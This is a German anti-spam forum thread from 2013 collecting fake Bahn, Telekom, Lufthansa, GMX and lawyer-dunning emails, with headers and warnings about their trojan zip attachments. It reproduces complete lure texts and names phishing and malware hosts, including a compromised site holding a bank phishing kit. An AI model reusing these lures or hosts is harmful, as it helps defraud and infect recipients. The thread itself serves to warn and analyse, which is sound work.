Received: from advi18.static.otenet.gr ([79.129.59.8]) by smtpin.rzone.de (RZmta 32.1 OK) with ESMTP ID: [ID filtered]
Received: from [26.65.164.119] (helo=vtgvycfgpk.phqxoaxgudyb.biz) by advi18.static.otenet.gr with esmtpa (Exim 4.69) (envelope-from ) ID: [ID filtered]
Message-ID: [ID filtered]
From: <buchungsbestaetigung [at] bahn.de>
To: <poor [at] spamvictim.tld>
Subject: Buchungsbest&#228;tigung (Auftrag LAN4A4)
Date: Mon, 16 Sep 2013 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=a__dabqwqobw_59_32_85"



Buchungsbest&#228;tigung (Auftrag 86D19O)

Sehr geehrte, vielen Dank f&#252;r Ihren Fahrkartenkauf. Ihre Buchungsdaten: Auftragsnummer: MY5FRH Identifizierungskarte: BahnCard ****5530 Kundennummer: 97101398 Das sollten Sie wissen: Bitte drucken Sie Ihr Online-Ticket im DIN A4 Format aus!

Kein Link, kein Dateianhang, nix... was soll DAS denn bringen?

die üben noch - gehört eher in die Exploits-Abteilung.

Gehört das HIER hin? Ich dachte HIER seien eMails mit
- Viren im Anhang
- Links zu "verseuchten" websites
- dazu Auffordern, irgendetwas zu bezahlen
- links, die codiert irgendwie Rückschlüsse auf die Existenz des Bespammten liefern.

in dieser "Buchungsbestätigung" ist ja nix dergleichen, daher hatte ich das nicht in dieswer Rubrik gesehen. Meine Frage bleibt: Was soll eine solche eMail bringen?

in dieser "Buchungsbestätigung" ist ja nix dergleichen, daher hatte ich das nicht in dieswer Rubrik gesehen. Meine Frage bleibt: Was soll eine solche eMail bringen?
Wie Thomas schrieb: die üben noch.

Wuschel

in dieser "Buchungsbestätigung" ist ja nix dergleichen, daher hatte ich das nicht in dieswer Rubrik gesehen. Meine Frage bleibt: Was soll eine solche eMail bringen?

Solche verseuchten Anhänge werden oft 'on the fly' vom Virenprogramm von einem ebenso gecrackten Server angefordert (da die Viren meist stundstündlich 'mutieren', um einen Vorsprung vor den Virenscannern zu gewinnen). Wenn der aber gerade unpässlich ist...

Eben aufgeschlagen und wird eine gecrakcte Seite sein trauriges inneleben aber interessant!!!!


http://creonsystems.com.au/deutschebank
Unbedingt sollte man sich da hier ansehen!!!

[DIR] Parent Directory -
[ ] gen_validatorv4.js 06-Feb-2012 00:21 31K
[TXT] initger.do.htm 14-Mar-2013 04:00 21K
[DIR] initger.do_files/ 14-Sep-2013 12:58 -
[ ] process.php 14-Sep-2013 10:24 4.4K
lerne deinen Feind kennen man bekommt ja selten sowas zu sehen ;) bitte tackern habs eben gesehen!

Jetzt ist wieder die Telekom dran. Heute bereits in zwei identischen Varianten aufgeschlagen:


Betreff: RechnungOnline Monat Oktober 2013

Ihre Rechnung für Oktober 2013

Guten Tag,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat Oktober 2013 beträgt: 41,87 Euro.

Den aktuellen Einzelverbindungsnachweis – sofern von Ihnen beauftragt – und das Rechnungsarchiv finden Sie im Kundencenter.

Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse. Bei Fragen zu RechnungOnline nutzen Sie unser Kontaktformular.

Informationen über die Umstellung auf den einheitlichen Euro-Zahlungsverkehrsraum (SEPA) finden Sie hier.

Speziell für Sie: Möchten Sie zukünftig Informationen über neue Produkte und Tarife erhalten, melden Sie sich zu unserem kostenlosen Informationsservice an.

Mit freundlichen Grüßen

R*** H***
Leiter Kundenservice
Die Summe variiert leicht. An die erste Mail ist eine "2013_10rechnung_1101018827.zip (https://www.virustotal.com/de/file/5d8d5e86165091b7b5aac4c98e9f069075c5191e250f3bec97cbc57c1e0b3fda/analysis/1380557556/)" [Link führt zu VirusTotal.com] und an die zweite eine "2013_10rechnung_0053543959.zip" angehangen, die beide virenverscuht sind. Der Link führt zum Scanergebnis von VirusTotal.com, wo derzeit 16 von 48 Scannern anschlagen.

Beide Mails wurden über Botnetze abgesetzt und fälschen im HELO eine Telekom-Absenderangabe:

Received: from mail.balticmaster.lt (mail.balticmaster.lt [82.135.221.67])
by mx.kundenserver.de (node=mxeu0) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from [7.117.99.105] (helo=snqxpbxbblafn.bxmgbdgcy.com)
by mail.balticmaster.lt with esmtpa (Exim 4.69)
(envelope-from )
ID: [ID filtered]
for poor [at] spamvictim.tld; Mon, 30 Sep 2013 xx:xx:xx +0200
Date: Mon, 30 Sep 2013 xx:xx:xx +0200
From: <rechnungonline. [at] telekom.de>
To: poor [at] spamvictim.tld
Subject: RechnungOnline Monat Oktober 2013

Received: from [217.6.27.26] ([217.6.27.26])
by mx.kundenserver.de (node=mxbap4) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from [201.44.40.117] (account ***@telekom.de HELO ipsfnvxg.bvzghl.com)
by (CommuniGate Pro SMTP 5.2.3)
with ESMTPA ID: [ID filtered]

Wie immer gilt: Finger weg!
Schönen Gruß
Mittwoch

Nun hat man sich die Anhänge erspart, dafür massenhaft verschleierte Links in einer html Mail

From - Wed Oct 02 xx:xx:xx 2013
X-Account-Key: account3
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: from ip-gt.190.143.206.241.telefonica-ca.net ([190.143.206.241])
by mail-in7-pp.ewetel.de (8.12.1/8.12.9) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Wed, 2 Oct 2013 xx:xx:xx +0200
X-Envelope-To: <poor [at] spamvictim.tld>
Received: from [235.200.235.134] (port=95014 helo=[192.168.2.53])
by 190.143.206.241 with asmtp
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 2 Oct 2013 xx:xx:xx -0600
Message-ID: [ID filtered]
Date: Wed, 2 Oct 2013 xx:xx:xx -0600
From: support [at] orders.staples.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20110929 Thunderbird/7.0.1
MIME-Version: 1.0
To: poor [at] spamvictim.tld
Subject: Staples order #: 3568250447
Content-Type: multipart/alternative;
boundary="------------030309050909090706040604"
X-Spam: Not detected
X-Mras: Ok
X-CheckCompat: OK


Thank you for shopping Staples.Here's what happens next:

Order No.:3568250447

Customer No.:1904063296 Method of Payment:Credit Card

Track order: Track your order


Delivery Address:Alex Smith46 COMMERCE STGREENFIELD CA 088399732

Item1 Qty. Subtotal
DELL 1320 BLACK TONERItem No.:747062Price:$68.72/eachExpected delivery:10/4/2013byUPS 2 $120.93

Item2 Qty. Subtotal
DELL RY854 CYAN TONERItem No.:716118Price:$67.72/eachExpected delivery:10/4/2013byUPS 2 $128.20



Subtotal:: $246.92
Delivery: FREE
Tax: $15.55

Total: $251.82

Your order is subject to review and the expected delivery date(s) noted above are pending credit or check approval. Won't be there to sign for your order from 9 am to 5 pm, Monday - Friday. Print ourDriver Release. Some residential orders may be delivered by UPS as late as 7 pm. Questions about your order? Call us at 1-800-3STAPLE (1-800-378-2753) or email us poor [at] spamvictim.tld. You can also fax us at 1-800-333-3199. See our return policy. Our prices vary from store prices. Not responsible for typographical errors. Not all items are available. We reserve the right to limit quantities, including the right to prohibit sales to resellers. Thanks for shopping Staples.




Den html Anteil erspare ich mir

die obskuren Links zeigen auf http://fuzongroup.com/pointer/blabla/blaba (Zusätze immer verschieden!)

Hallo zusammen,

gestern habe ich folgende Mail von GMX(?) bekommen.


Liebes GMX Mitglied,

eine an Sie adressierte E-Mail wurde von unserem Virenscanner
als gefährlich eingestuft.


Um weiteren Schaden für Sie auszuschließen, wurde die E-Mail gelöscht.

Es folgen Details zu der betroffenen E-Mail:

Von: "Abmahnung Lasse Thurn" <poor [at] spamvictim.tld>
An: "Mein Name" <Meine poor [at] spamvictim.tld>
Datum: Wed, 2 Oct 2013 xx:xx:xx GMT
Betreff: Ihre stornierte Bank-Lastschrift von >Mein Name<

Falls Ihnen der Absender persönlich bekannt ist, sollten Sie sich mit
ihm in Verbindung setzen und ihn darauf hinweisen, dass sein PC
wahrscheinlich von einem Virus befallen ist.

Die Einstellungen zu Ihrem GMX Virenscanner können Sie jederzeit unter
Optionen/Virenschutz anpassen.

Ihr GMX Team

[ Dies ist eine automatisch generierte Nachricht, bitte
antworten Sie nicht an diesen Absender. Weitere Informationen
finden Sie in der Online-Hilfe unter http://faq.gmx.net ]

Was haltet ihr davon? Das ist das 1. Mal, dass ich solch eine Mail bekomme

MIME-Version: 1.0
Message-ID: [ID filtered]
From: "GMX Virenschutz" <virenschutz [at] gmxnet.de>
To: meine poor [at] spamvictim.tld
Subject: VIRENVERDACHT: "Abmahnung Lasse Thurn" <anonymisiert [at] orange.fr>
Content-Type: multipart/mixed;
boundary="----=_Part_120482244_1929623221.1380734869528"
Date: Wed, 2 Oct 2013 xx:xx:xx +0200 (CEST)
X-Provags-ID: [ID filtered]
CC9X9ONpF44gnFzy74PiN7+9zTDz0IVB80RSFMXAUQjLVa9s6R
jUh8LMLuSPesd6RKzCR8PejjA6XWrAjXOfhIRE+kL7y9lrmdm1
jwPEBmoo0jxCj7b9PZdbdlhdN8pLlMc/Wbgj6TMOirK9udwBC8
yTTgbzNecHHOIXHPpDftvUBEZN/QdRlkI5kUAjJjTYYL3kucVd
AZO6HNsEroIFtGRAq+bhUjMu/PvQBxEPssaNy92uwZPwfSEenf wUI4FY=
X-Antivirus: avast! (VPS 131002-0, 02.10.2013), Inbound message
X-Antivirus-Status: Clean

Gruß Frechdachs

@ Moderation: Falls woanders besser passt, bitte verschieben.

Ich erhalte diese Emails auch mit gewisser regelmäßigkeit.
aber das hier sollte reichen um die email zu filtern und zu löschen.

VIRENVERDACHT: "Abmahnung Lasse Thurn" <anonymisiert [at] orange.fr>

Denn ich gehe davon aus das DU mit keinen aus der richtung zu tun hast oder?

gruß

Was haltet ihr davon? Das ist das 1. Mal, dass ich solch eine Mail bekomme
Ist doch positiv. GMX hat das Muster richtig erkannt und die Mail in Quarantäne geschoben. Ist der übliche Schädlingsmist, die Meldung ist hier indirekt also ganz richtig.

Schönen Gruß
Mittwoch

Return-Path: <rancidityesbj9 [at] booking-lufthansa.com>
Delivery-Date: Tue, 29 Oct 2013 xx:xx:xx +0100
Received: from 87-252-35-244.fast.net.uk (87-252-35-244.fast.net.uk [87.252.35.244])
by mx.kundenserver.de (node=mxbap0) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from [73.197.113.145] (helo=wrkvoyprdi.owrbxgt.ua)
by 87-252-35-244.fast.net.uk with esmtpa (Exim 4.69)
(envelope-from )
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 29 Oct 2013 xx:xx:xx +0000
Message-ID: [ID filtered]
From: <online [at] booking-lufthansa.com>
Subject: Reiseinformation, Abflug am 08. November 2013; KV61D
Date: Tue, 29 Oct 2013 xx:xx:xx +0000
Die 73.197.113.145, über die die Mail abgeworfen wurde, gehört zu einer amerikanischen Kabellgesellschaft, vermutlich Zombie.

Man versucht den Trick mit einer Online-Buchung (meine Hervorhebungen):


Falls Sie diese Reiseinformation nicht oder nur teilweise lesen können, öffnen Sie bitte die angehängte PDF-Version.
Dieses ist eine automatisch erzeugte e-Mail. Bitte antworten Sie nicht hierauf.
Buchungscode:
6WO28D
Lufthansa Service Center

Reiseinformation

Reisedaten für:
Ticketnummer: 508-9456207095 *
etixŽ Identifikation: XXXXXXXXXXXX3604

* Den Passenger Receipt (Rechnungsbeleg) erhalten Sie durch einen Klick auf die Flugscheinnummer bis 30 Tage nach Reisebeginn.

Flug Datum Von Nach Abflug Ankunft Buchung
Hier stehen dann keine Daten… [Bemerkung von Mittwoch eingefügt]
Alleinreisendes Kind:

Flug Datum Von Nach Abflug Ankunft Buchung
Hier stehen dann keine Daten… [Bemerkung von Mittwoch eingefügt]
Alleinreisendes Kind:


Informationen für Ihren Flug

Für Sie wurde ein elektronisches Ticket erstellt. Die Bordkarte für Ihren Lufthansa Flug erhalten Sie schnell und bequem ab 23 Std. vor Abflug über den Online Check-in auf lufthansa.com. Halten Sie bitte zur Identifikation Ihren Buchungscode, Ihre Miles & More Credit Card oder die Kreditkarte bereit, die Sie zur Buchung genutzt haben. Alternativ können Sie Ihre Bordkarte auch am Flughafen an einem Check-in Automaten erhalten.

Der Rest der Mail ist gekürzt, entspricht dem Lufthansa-Standard und wurde vermutlich von dort raubkopiert. [Bemerkung von Mittwoch eingefügt]
Im Anhang ist dann eine Datei namens 20131029_elektronisches Ticket_582SJJ.zip, die laut VirusTotal erwartungsgemäß nicht ganz koscher ist (https://www.virustotal.com/de/file/135269bd33c1e5342dbd7ac258025aec6ebfd750366d8903ae5407b0f43e757d/analysis/1383043057/). Wie üblich sprechen derzeit noch nicht viele Scanner an. Allein die Tatsache, dass es sich um eine ZIP-Datei anstelle der angekündigten PDF-Datei handelt, ist Indiz genug. [Eine PDF-Datei ist allerdings nicht minder gefährlich, denn sie kann auch Schädlinge enthalten.]

Schönen Gruß
Mittwoch

Meine Frau hat eine Mail an ihre GMX-Adresse bekommen, sie müsse noch 296 Euro an die Firma Comtech zahlen. Die Absenderadresse ist "geklaut" und gehört zu einem Sportverein. Den vollständigen Header habe ich leider nicht vorliegen.

Was mich an diesem Exemplar irritiert ist dass es weder einen Dateianhang noch einen Link enthielt. Kann es sein, dass GMX das ausgefiltert hat? Oder hat Spammy einfach etwas falsch konfiguriert? So ergibt die "Mahnung" jedenfalls überhaupt keinen Sinn. Wir haben auch noch nie was bei Comtech bestellt, und wenn dann würden die wohl kaum Mahnungen von einer TSV-irgendwas-Adresse verschicken.

P.S.: Die Mail enthielt als Anrede den (korrekten) Mädchennamen meiner Frau.

mal in den html teil geschaut? evtl. sind da ja gefälschte Links etc.
Mir ist letzte Woche schon mal bei ner anderen Spam in deutsch aufgefallen, dass der Anhang vergessen wurde...

Nein, da ist tatsächlich überhaupt gar kein Link enthalten.

Ja dann tipp ich mal auf falsche Konfig.
Ich weis nicht genau, wie das bei GMX ist, aber zumindest sollte ein Vermerk im Betreff stehen, wenn ein Anhang gelöscht wurde, bzw würde die Mail gar nicht zugestellt werden.

hatte bei GMX auch schon so eine Mail bekommen ohne Anhang.

Hallo zusammen,

das ist grade aufgeschlagen.


Verehrter Kunde,

der fällige Betrag konnte nicht von Ihrem Konto automatisch abgezogen werden. Es wurden Überweisungen bis zum 21.11.2013 einbezogen.

Vorgangsnummer: GFC6548606C
Produkt/Leistung: 153963013
Gesamtbetrag: 476,00 Euro

Der Rechnungsbetrag der Bestellung inklusive der Versandkosten beläuft sich auf 476,00 Euro. Unser Anwaltsbüro wurde berechtigt die fällige Gesamtsumme für Ihre Bestellung einzufordern. Zuzüglich wird Ihnen eine Mahngebühr von 12,00 Euro verrechnet und die Kosten unserer Tätigkeit von 27,93 Euro.

Sparen Sie uns bitte weitere Maßnahmen gegen Ihre Person. Wenn Sie die Überweisung weigern werden wir umgehend ein Inkassobüro zu Hilfe ziehen. Sie haben bis zum 25.11.2013 die letzte Möglichkeit das Geld zu zahlen.

Die Lieferdaten Ihrer PayPal Rechnung und die Kontodaten zur Überweisung sind im Anhang.

Mit freundlichen Grüßen

Beauftragte Anwaltschaft Rafael Grebel und Capito

Im Anhang: Forderung der abgewiesenen Zahlung - Im Auftrag Anwalt. zip 52,0 KB

Return-path: <lpage [at] hawaii.rr.com>
Delivery-date: Thu, 21 Nov 2013 xx:xx:xx +0100
Received: from [195.4.92.12] (helo=mx2.freenet.de)
by mbox11.freenet.de with esmtpa (ID: [ID filtered]
ID: [ID filtered]
for poor [at] spamvictim.tld; Thu, 21 Nov 2013 xx:xx:xx +0100
Received: from cdptpa-outbound-snat.email.rr.com ([107.14.166.226]:47524 helo=cdptpa-oedge-vip.email.rr.com)
by mx2.freenet.de with esmtp (port 25) (Exim 4.80.1 #4)
ID: [ID filtered]
for poor [at] spamvictim.tld; Thu, 21 Nov 2013 xx:xx:xx +0100
Authentication-Results: cdptpa-oedge02 smtp.user=lpage [at] hawaii.rr.com; auth=pass (LOGIN)
Received: from [80.130.205.81] ([80.130.205.81:64366] helo=PC)
by cdptpa-oedge02 (envelope-from <lpage [at] hawaii.rr.com>)
(ecelerity 3.5.0.35861 r(Momo-dev:tip)) with ESMTPA
ID: [ID filtered]
From: "Anwalt" <lpage [at] hawaii.rr.com>
Message-ID: [ID filtered]
To: "Mein Name" <poor [at] spamvictim.tld>
Subject: 21.11.2013 Ihre Konto-Lastschrift ist gescheitert
Date: Thu, 21 Nov 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC8B7584C8"
X-RR-Connecting-IP: 107.14.168.130:2525
X-Cloudmark-Score: 0
X-purgate-ID: [ID filtered]
Delivered-To: poor [at] spamvictim.tld
Delivered-To: poor [at] spamvictim.tld
Envelope-to: poor [at] spamvictim.tld
X-Originated-At: 107.14.166.226!47524
Delivered-To: poor [at] spamvictim.tld

Gruß Frechdachs

Ein Anwalt warnt vor "Mahnungsschreiben" für angebliche Forderungen für Ikea, in denen mißbräuchlich sein Name verwendet wird.
http://www.anwalt.de/rechtstipps/warnung-falsche-mahnung-unter-ausnutzung-des-namens-doering_053046.html

Moin zusammen,

auf ein neues.
Return-Path: <benzcfm3 [at] t-online.de>
Received: from mailout10.t-online.de (mailout10.t-online.de [194.25.134.21])
(using TLSv1 with cipher AES256-SHA (256/256 bits))
(No client certificate requested)
by mtain-di01.r1000.mx.aol.com (Internet Inbound) with ESMTPS ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 25 Nov 2013 xx:xx:xx -0500 (EST)
Received: from fwd03.aul.t-online.de (fwd03.aul.t-online.de )
by mailout10.t-online.de with smtp
ID: [ID filtered]
Received: from neousin-d200720 (rxcjDOZHZhUyzcw1Wi0kjoSUqS1Xv6yY8oMqkPRFDF0Dzx1BZsqPiqcIOq8qSNlgx8@[94.219.249.146]) by fwd03.t-online.de
with esmtp ID: [ID filtered]
From: "Online Mahnung" <benzcfm3 [at] t-online.de>
To: "Kein Name" <poor [at] spamvictim.tld>
Subject: Die Buchung von Ihrem Konto konnte nicht erfolgen
Date: Mon, 25 Nov 2013 xx:xx:xx GMT


Sehr geehrter Kunde,

der fällige Betrag konnte nicht von Ihrem Konto automatisch gebucht werden. Es wurden Geldeingänge bis zum 22.11.2013 berücksichtigt.

Die Gesamtsumme der Bestellung inklusive der Versandkosten entspricht 499,00 Euro. Unsere Kanzlei wurde berechtigt den ausstehenden Betrag für Ihre Bestellung einzufordern. Zuzüglich wird Ihnen eine Mahngebühr von 17,00 Euro verrechnet und die Kosten unserer Beauftragung von 42,98 Euro.

Mahnung Nr.: GH178601728H

Ersparen Sie uns bitte weitere Maßnahmen gegen Ihre Person. Wenn Sie die Überweisung verweigern müssen Sie mit sehr erheblichen Bußgeldern rechnen. Sie haben bis zum 28.11.2013 Zeit die gesamte Summe zu überweisen.

Detaillierte Einzelheiten Ihrer PayPal Rechnung und die Kontonummer zur Nachzahlung sehen Sie im angehängten Ordner.

Mit freundlichen Grüßen

Rechnungsstelle Maurice von Hohenegg und Stein

Und der übliche zip-Anhang mit 22,5 KB.


Gruß Frechdachs

Hallo allerseits,

die scheint aus der selben Schmiede zu kommen, der gleiche Rechtschreibfehler. >>Anwaltskanalei
Siehe Zeile 16 im Header und auch hier (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung&p=362261&viewfull=1#post362261).

Return-Path: <gaudetjg [at] videotron.ca>
Received: from relais.videotron.ca (relais.videotron.ca [24.201.245.36])
by mtaiw-mac04.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 25 Nov 2013 xx:xx:xx -0500 (EST)
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_g3H4uoQqcvIKysAiMClDiA)"
Received: from VL-MO-MA003 ([10.23.37.47]) by VL-VM-MR004.ip.videotron.ca
(Oracle Communications Messaging Exchange Server 7u4-22.01 64bit (built Apr 21
2011)) with ESMTP ID: [ID filtered]
droelf123nr2 [at] aol.com; Mon, 25 Nov 2013 xx:xx:xx -0500 (EST)
Message-ID: [ID filtered]
Received: from NBTAUSENDFREUDE
(dyndsl-095-033-110-161.ewe-ip-backbone.de [95.33.110.161])
by VL-VM-MR001.ip.videotron.ca with ESMTPA; Mon,
25 Nov 2013 xx:xx:xx -0500 (EST)
From: Anwaltskanalei <gaudetjg [at] videotron.ca>
To: Kein Name angegeben <poor [at] spamvictim.tld>
Subject: Rechnung der stornierten Zahlung Ihrer Bestellung 25.11.2013
Date: Mon, 25 Nov 2013 xx:xx:xx +0000 (GMT)



Symantec hat gefiltert.

This message has been processed by Symantec's AntiVirus Technology.

25.11.2013 Beauftragte Anwaltschaft - stornierte Lastschrift.com was infected with the malicious virus Trojan Horse and has been deleted because the file cannot be cleaned.


For more information on antivirus tips and technology, visit
http://ses.symantec.com/

Originaltext

Sehr geehrter Kunde,

der automatische Abzug von Ihrem Bankkonto f=C3=BCr die Bestellung vom 08.1=
0.2013 konnte nicht durchgef=C3=BChrt werden. Es wurden Geldeing=C3=A4nge b=
is zum 22.11.2013 einbezogen.=20

Die Summer der Bestellung inklusive der Versandkosten entspricht 413,00 EU.=
Unser Anwaltsb=C3=BCro wurde beauftragt das Geld f=C3=BCr Ihre Bestellung =
einzufordern. Zuz=C3=BCglich wird Ihnen eine Mahngeb=C3=BChr von 17,00 Euro=
verrechnet und die Geb=C3=BChren unserer Beauftragung von 59,21 Euro.=20

Vorgangsnummer: GAH754786G

Sparen Sie uns bitte weitere rechtlichen Schritte gegen Ihre Person. Wenn S=
ie die Zahlung verweigern sehen wir und gezwungen ein Gerichtsverfahren geg=
en Sie anzustreben. Sie haben bis zum 27.11.2013 die letzte M=C3=B6glichkei=
t die gesamte Summe zu zahlen.=20

Weitere Details Ihrer PayPal Rechnung und die Bankdaten zur Nachzahlung seh=
en Sie im angeh=C3=A4ngten Ordner.=20

Mit freundlichen Gr=C3=BC=C3=9Fen=20

Online Mahnung Maurice Melber und Schulze
Gruß Frechdachs

Hallo bin dabei allerding hatte GMX was da gegen mir die Mail zuzeigen ;) die Mail ging an eine Adresse die nirgens gebraucht wurde somit wäre das Datenleck bei GMX bewiesen. Denn dei Addy ist Jahre alt und war nicht in gebrauch.

Liebes GMX Mitglied,
eine an Sie adressierte E-Mail wurde von unserem Virenscanner
als gefährlich eingestuft.
Um weiteren Schaden für Sie auszuschließen, wurde die E-Mail gelöscht.

Es folgen Details zu der betroffenen E-Mail:

Von: "Beauftragte Anwaltschaft" <poor [at] spamvictim.tld>
An: "me" <poor [at] spamvictim.tld>
Datum: Tue, 26 Nov 2013 xx:xx:xx GMT
Betreff: Klar Name stand drin... die Lastschrift konnte von Ihrem Bankkonto nicht vorgenommen werden

MFG

Carsten

Datenleck kann sein, oder auch einfach brute force. Mag sein, dass der Spammer einfach verschiedene Buchstabenkombinationen und gängige Namen @gmx.de durchprobiert.

Aber ich habe heute auch so einen Virus bekommen, wenn ich mich recht erinnere zum ersten mal auf diese Adresse. Also hat da wohl jemand wieder irgendwo Adressen eingekauft.

Hallo diese Emailadresse hatte aber mit meinen Namen nichts zu tun begann mit dirty noch was usw. also wäre Brutforce hier falsch wohl eher das Datenleck.

Return-Path: <goshesh8 [at] gmxnet.de>
Received: from 66.170.broadband10.iol.cz ([90.177.170.66]) by
mr1.firma.tld with esmtp (envelope-from <goshesh8 [at] gmxnet.de>) id
1VnnYo-00060L-Ce for poor [at] spamvictim.tld; Tue, 03 Dec 2013
xx:xx:xx +0100
Received: from [137.1.181.101] (account tacticallymqh69 [at] gmxnet.de HELO
dalubhmlrlnhpr.qvmwkweesqsff.tv) by 66.170.broadband10.iol.cz (CommuniGate
Pro SMTP 5.2.3) with ESMTPA ID: [ID filtered]
adress [at] firma.tld; Tue, 3 Dec 2013 xx:xx:xx +0100
Date: Tue, 3 Dec 2013 xx:xx:xx +0100
From: GMX <rechnungsstelle [at] gmxnet.de>
To: <poor [at] spamvictim.tld>
Subject: GMX - Ihre Rechnung vom 03.12.2013
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=a__jobpwmc_06_81_74"


Ihre Kundennummer: 483108802

Sehr geehrter,

anbei erhalten Sie Ihre Rechnung vom 03.12.2013.
Wie vereinbart werden wir den Betrag in den nächsten Tagen von Ihrem Konto einziehen.

Ihre Rechnung ist im PDF-Format erstellt worden. Um sich Ihre Rechnung anschauen zu können, klicken Sie auf den Anhang und es öffnet sich automatisch der Acrobat Reader. Sollten Sie keinen Acrobat Reader besitzen, haben wir für Sie den Link zum kostenlosen Download von Adobe Acrobat Reader mit angegeben. Er führt Sie automatisch auf die Downloadseite von Adobe. So können Sie sich Ihre Rechnung auch für Ihre Unterlagen ausdrucken.

http://www.adobe.de/products/acrobat/readstep2.html

GMX ist ein Dienst der 1&1 Mail & Media GmbH.


Mit freundlichen Grüßen

Ihr GMX Kundenservice


--

Impressum: http://gmxnet.de/de/impressum

[ Dies ist eine automatisch generierte Nachricht, bitte antworten Sie nicht an diesen Absender.
Falls Sie Fragen an den GMX Support haben, verwenden Sie bitte das Formular auf www.gmx.de/rechnungsfragen ]

Im Anhang: RG098653308.zip = RG098653308.pdf.exe = Trojaner RDN/Generic PWS.y!wh


Eniac

x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 81.169.158.170) smtp.mailfrom=Telekom [at] mail.kmu.cmbl.de; dkim=none header.d=rinne-hiltrup.de; x-hmca=none header.id=ulli [at] rinne-hiltrup.de
X-SID-PRA: ulli [at] rinne-hiltrup.de
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTnndnfpCmYs2XILNdLm2UmGCWhFy6SREG64AXXtVirb+hjK+fv5/PfWh1Hf8Smu5d0+/t9wqUDVcPMgrK61pGVU4B0QegbfOPD3cOlAaxibxIIjUHI/9FFyLJOBpvtYvXLYgRJwoUpEWLw82ohVAvDcam3O6HHoilHMthlFWtNyCi2113fPTLTqycV9/HabXIsoSIV7Lmkh3jg/9LSuun+L
Received: from mail.kmu.cmbl.de ([81.169.158.170]) by COL0-MC1-F3.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Thu, 19 Dec 2013 xx:xx:xx -0800
Received: from localhost (localhost [127.0.0.1])
by mail.kmu.cmbl.de (Postfix) with ESMTP ID: [ID filtered]
for <***>; Fri, 20 Dec 2013 xx:xx:xx +0100 (CET)
X-Virus-Scanned: amavisd-new at stratoserver.net
X-Amavis-Alert: BANNED, message contains .exe,.exe-ms,Ihre Telekom Mobilfunk
RechnungOnline =?iso-8859-1?Q?f=81r_Gesch=84ftskunden?=
7295457930907458 vom 19.12.2013 des Kundenkontos.exe
Received: from mail.kmu.cmbl.de ([127.0.0.1])
by localhost (h2034942.stratoserver.net [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP ID: [ID filtered]
Fri, 20 Dec 2013 xx:xx:xx +0100 (CET)
Received: from w7-delmarco (mx.rbt.at [83.175.125.162])
by mail.kmu.cmbl.de (Postfix) with ESMTPA ID: [ID filtered]
for <***>; Fri, 20 Dec 2013 xx:xx:xx +0100 (CET)
Date: Fri, 20 Dec 2013 xx:xx:xx +0100
From: Telekom Deutschland GmbH
<ulli [at] rinne-hiltrup.de>
To: ***
X-MSMail-Priority: High
X-Priority: 1
Priority: urgent
Importance: high
X-MimeOLE: Produced by Blat v3.1.1
X-Mailer: Blat v3.1.1, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: [ID filtered]
Subject: =?ISO-8859-1?Q?Ihre_Telekom_Mobilfunk_RechnungOnline_f=FCr?=
=?ISO-8859-1?Q?_Gesch=E4ftskunden_050050252532555739_vom_19=2E12=2E2013_des?=
Kundenkontos 006006392254.
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_BlatBoundary-QtC4lEZSjZjDVAp0rcGTs"
Return-Path: Telekom [at] mail.kmu.cmbl.de
X-OriginalArrivalTime: 20 Dec 2013 xx:xx:xx.0078 (UTC) FILETIME=[34B797E0801CEFD19]




Sehr geehrte Kundin,
sehr geehrter Kunde

Im Anhang finden Sie die gewünschten Dokumente und Daten zu Ihrer Telekom Mobilfunk RechnungOnline für Geschäftskunden vom Monat November. Zum Umgang mit verschlüsselten Dateien finden Sie bei Bedarf Hinweise unter:

https://rechnungonline-business.t-mobile.de

Mit freundlichen Grüßen,
Geschäftskundenservice

Telekom Deutschland GmbH
Aufsichtsrat: Timotheus Höttges Vorsitzender
Geschäftsführung: Niek Jan van Damme Sprecher, Thomas Dannenfeldt, Thomas Freude, Michael Hagspihl, Dr. Bruno Jacobfeuerborn, Dietmar Welslau, Dr. Dirk Wössner
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 122265872
WEEE-Reg.-Nr.: 60800328





Als Anhang gibt es eine Datei " Telefonrechnung_Telekom_November_2013_PDF.zip "
mit einer EXE-Datei.

E-mail an:
ueberweisung-f-s-4 [at] finanz-institut.com

Der Download enthält ein Virus.

Empfanger dieser Mail hängen in einem Verteiler.
Jede Antwort auf diese Mail erhalten alle Empfänger der Spam-Mail.

Bitte nicht darauf antworten.

Inhalt:

Sehr geehrte Kundin,
sehr geehrter Kunde

